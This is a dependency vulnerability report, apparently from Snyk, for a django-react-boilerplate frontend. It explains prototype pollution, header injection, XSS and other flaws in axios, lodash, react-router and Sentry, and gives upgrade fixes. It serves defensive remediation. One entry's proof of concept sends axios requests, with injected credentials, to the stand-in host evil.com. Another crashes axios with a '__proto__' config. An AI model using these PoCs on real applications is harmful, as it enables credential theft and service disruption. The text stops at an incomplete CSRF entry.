Vulnerabilities

 21 via 37 paths

Dependencies

 52

Source

 GitHub

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 3
  • 7
  • 11
Status
  • 21
  • 0
  • 0

critical severity
new

HTTP Response Splitting

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to HTTP Response Splitting via the isFormData and getHeaders handling in the HTTP request path. An attacker can inject arbitrary request headers by supplying a prototype-polluted object that is mistaken for FormData, causing getHeaders() output to be merged into an outgoing request. This lets attacker-controlled values, such as authorization or custom headers, ride along with requests made by applications that pass untrusted objects into Axios, exposing credentials or altering server-side request handling.

Notes

  • The gadget only matters when the request body is a non-FormData payload that Axios still routes through the Node HTTP adapter’s form-data detection path; browser-side usage is not implicated by this code path.
  • The advisory’s prototype-pollution prerequisite can come from any dependency in the application’s tree, not necessarily from Axios itself, so a separate merge/parser bug elsewhere can be enough to trigger the header injection.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

HTTP Response Splitting vulnerability report

critical severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution through the mergeConfig code path in the request configuration handling. An attacker can influence request behavior by supplying a crafted config object with inherited properties such as transport, env, formSerializer, or transform callbacks on Object.prototype, causing Axios to use attacker-controlled settings during request dispatch and form serialization. This can redirect requests, alter serialization and response handling, and break application logic that relies on trusted per-request configuration.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

Prototype Pollution vulnerability report

critical severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.2.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution when the Object.prototype has been polluted via a different exploit. The following properties in the HTTP adapter configuration may be manipulated, as they do not restrict their own property accesses with hasOwnProperty. An attacker can inject Authorization headers into the auth property, redirect external requests via the baseURL property or internal requests via the socketPath property, execute callbacks contained in HTTP redirects via the beforeRedirect property, or enable insecure HTTP parsing via the insecureHTTPParser property.

PoC

const axios = require('axios');

// Prototype pollution from a vulnerable dependency in the same process
Object.prototype.auth = { username: 'attacker', password: 'exfil' };
Object.prototype.baseURL = 'https://evil.com';

await axios.get('/api/users');
// Request is sent to: https://evil.com/api/users
// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=
// Attacker receives both the request and injected credentials

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 1.15.2 or higher.

References

Prototype Pollution vulnerability report

high severity

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.13.5.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution via the mergeConfig function. An attacker can cause the application to crash by supplying a malicious configuration object containing a __proto__ property, typically by leveraging JSON.parse().

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://domain/get", maliciousConfig);

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.30.3, 1.13.5 or higher.

References

Prototype Pollution vulnerability report

high severity
new

Uncontrolled Recursion

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Uncontrolled Recursion through the toFormData recursive serializer in lib/helpers/toFormData.js. An attacker can crash a process by supplying a deeply nested object as request data or params, causing unbounded recursion and a call-stack overflow during multipart/form-data or query-string serialization.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

Uncontrolled Recursion vulnerability report

high severity

Arbitrary Code Injection

  • Vulnerable module: lodash
  • Introduced through: lodash@4.17.23

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate lodash@4.17.23
    Remediation: Upgrade to lodash@4.18.1.

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Arbitrary Code Injection due the improper validation of options.imports key names in _.template. An attacker can execute arbitrary code at template compilation time by injecting malicious expressions. If Object.prototype has been polluted, inherited properties may also be copied into the imports object and executed.

Notes:

  1. Version 4.18.0 was intended to fix this vulnerability but it got deprecated due to introducing a breaking functionality issue.

  2. This issue is due to the incomplete fix for CVE-2021-23337.

Remediation

Upgrade lodash to version 4.18.1 or higher.

References

Arbitrary Code Injection vulnerability report

high severity
new

Improperly Controlled Modification of Dynamically-Determined Object Attributes

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.2.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes through the transformResponse and request serialization paths in the defaults configuration. An attacker can influence JSON parsing and request handling by supplying a crafted object with inherited parseReviver, responseType, transitional, env, or formSerializer properties, causing Axios to read attacker-controlled prototype values during response parsing or form encoding. This can lead to malformed response processing, unexpected parser behavior, and application-level data corruption or denial-of-service in code that passes untrusted config objects to Axios.

Remediation

Upgrade axios to version 1.15.2 or higher.

References

Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability report

high severity

Cross-site Scripting (XSS)

  • Vulnerable module: react-router
  • Introduced through: react-router@7.9.6

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate react-router@7.9.6
    Remediation: Upgrade to react-router@7.12.0.

Overview

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) in the navigation redirect process for loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes. An attacker can execute arbitrary JavaScript code in the context of the user's browser by supplying a crafted URL that is used as a redirect target.

Note:

This issue does not impact applications using Declarative Mode <BrowserRouter>.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade react-router to version 7.12.0 or higher.

References

Cross-site Scripting (XSS) vulnerability report

high severity

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: @sentry/core
  • Introduced through: @sentry/browser@10.19.0 and @sentry/react@10.19.0

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/browser@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/browser@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/browser@10.19.0 @sentry-internal/browser-utils@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/browser@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/browser@10.19.0 @sentry-internal/feedback@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/browser@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/browser@10.19.0 @sentry-internal/replay@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/browser@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/browser@10.19.0 @sentry-internal/replay-canvas@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/browser@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/browser@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/browser@10.19.0 @sentry-internal/replay@10.19.0 @sentry-internal/browser-utils@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/browser@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/browser@10.19.0 @sentry-internal/browser-utils@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/browser@10.19.0 @sentry-internal/feedback@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/browser@10.19.0 @sentry-internal/replay-canvas@10.19.0 @sentry-internal/replay@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/browser@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/browser@10.19.0 @sentry-internal/replay@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/browser@10.19.0 @sentry-internal/replay-canvas@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/browser@10.19.0 @sentry-internal/replay-canvas@10.19.0 @sentry-internal/replay@10.19.0 @sentry-internal/browser-utils@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/browser@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/browser@10.19.0 @sentry-internal/replay@10.19.0 @sentry-internal/browser-utils@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/browser@10.19.0 @sentry-internal/replay-canvas@10.19.0 @sentry-internal/replay@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.
  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate @sentry/react@10.19.0 @sentry/browser@10.19.0 @sentry-internal/replay-canvas@10.19.0 @sentry-internal/replay@10.19.0 @sentry-internal/browser-utils@10.19.0 @sentry/core@10.19.0
    Remediation: Upgrade to @sentry/react@10.27.0.

Overview

@sentry/core is a Base implementation for all Sentry JavaScript SDKs

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data via the sendDefaultPii configuration option. An attacker can gain access to sensitive HTTP headers, such as authentication cookies, by viewing traces stored within the organization. This is only exploitable if the sendDefaultPii setting is explicitly enabled in the configuration.

Workaround

This vulnerability can be mitigated by setting sendDefaultPii to false in the configuration.

Remediation

Upgrade @sentry/core to version 10.27.0 or higher.

References

Insertion of Sensitive Information Into Sent Data vulnerability report

high severity
new

HTTP Response Splitting

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to HTTP Response Splitting via the parseTokens header processing path in lib/core/AxiosHeaders.js. An attacker can smuggle HTTP requests or inject arbitrary headers by supplying a header value containing \r\n, which Axios merges into an outbound request. Under specific conditions, this can be used to exfiltrate cloud metadata tokens, pivot into internal services, or poison downstream HTTP traffic.

Notes

  • Exploitation requires prior successful prototype pollution in a third-party dependency, enabling attacker-controlled header data to flow into Axios via configuration merging or AxiosHeaders.set(...).
  • IMDSv2 token exfiltration (described in the original vulnerability report as another step in the exploit chain following the smuggling of a PUT request) further depends on the application running in an AWS environment with instance metadata access enabled, and on the Axios process having network access to the metadata endpoint.
  • A possible but uncommon vector mentioned in the maintainers' advisory relies on the use of a non standard Axios transport mechanism, e.g. a custom adapter, to bypass Node.js header validation, thereby permitting malformed or injected header values to be transmitted without rejection. In most cases, this vector is blocked by Node.JS's built in header validation.

Remediation

Upgrade axios to version 0.31.0, 1.15.0 or higher.

References

HTTP Response Splitting vulnerability report

medium severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the data.pipe(req) upload path in the HTTP adapter. An attacker can send a streamed request body larger than the configured maxBodyLength while maxRedirects is 0, causing the client to transmit the oversized payload to the server instead of stopping at the limit. This lets a remote peer force excessive bandwidth and request processing on applications that rely on maxBodyLength to cap upload size, potentially exhausting resources and disrupting service.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the HTTP response handling path in the http.js adapter. An attacker can force a client to accept and process a response body larger than maxContentLength by sending a streamed response with an oversized payload. This allows a remote server to bypass the configured response-size limit, causing the application to read and buffer more data than intended, potentially exhausting memory or stalling request processing.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity
new

CRLF Injection

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to CRLF Injection through the FormDataPart multipart header construction in the form-data streaming helper. An attacker can inject arbitrary multipart headers by supplying a Blob-like value whose type contains \r or \n, causing the generated Content-Type line to break and append attacker-controlled header fields. This lets a crafted upload alter the multipart body sent by the application, which can corrupt downstream request parsing and expose or tamper with data handled by the receiving server.

Remediation

Upgrade axios to version 1.15.1 or higher.

References

CRLF Injection vulnerability report

medium severity
new

Server-side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: axios@1.12.2

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate axios@1.12.2
    Remediation: Upgrade to axios@1.15.1.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through the AxiosHeaders normalization path and shouldBypassProxy helper. An attacker can smuggle CRLF and other control characters into request header values by supplying crafted header input, causing injected header fields to be sent on outbound requests and potentially altering how downstream servers interpret the request; in proxy configurations, a request to localhost, 127.0.0.1, or ::1 can be routed differently depending on the no_proxy entry, allowing loopback traffic to bypass the intended proxy handling.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

Server-side Request Forgery (SSRF) vulnerability report

medium severity

Prototype Pollution

  • Vulnerable module: lodash
  • Introduced through: lodash@4.17.23

Detailed paths

  • Introduced through: {{project_name}}-frontend@vintasoftware/django-react-boilerplate lodash@4.17.23
    Remediation: Upgrade to lodash@4.18.1.

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution via the _.unset and _.omit functions. An attacker can delete properties from built-in prototypes by supplying array-wrapped path segments, potentially impacting application behaviour.

Notes:

  1. Version 4.18.0 was intended to fix this vulnerability but it got deprecated due to introducing a breaking functionality issue.

  2. This issue is due to incomplete fix for CVE-2025-13465 which protects only against string key members.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.18.1 or higher.

References

Prototype Pollution vulnerability report

medium severity

Cross-site Request Forgery (CSRF)

  • Vulnerable module: react-router
  • Introduced through: react-router@7.9.6

Detailed paths

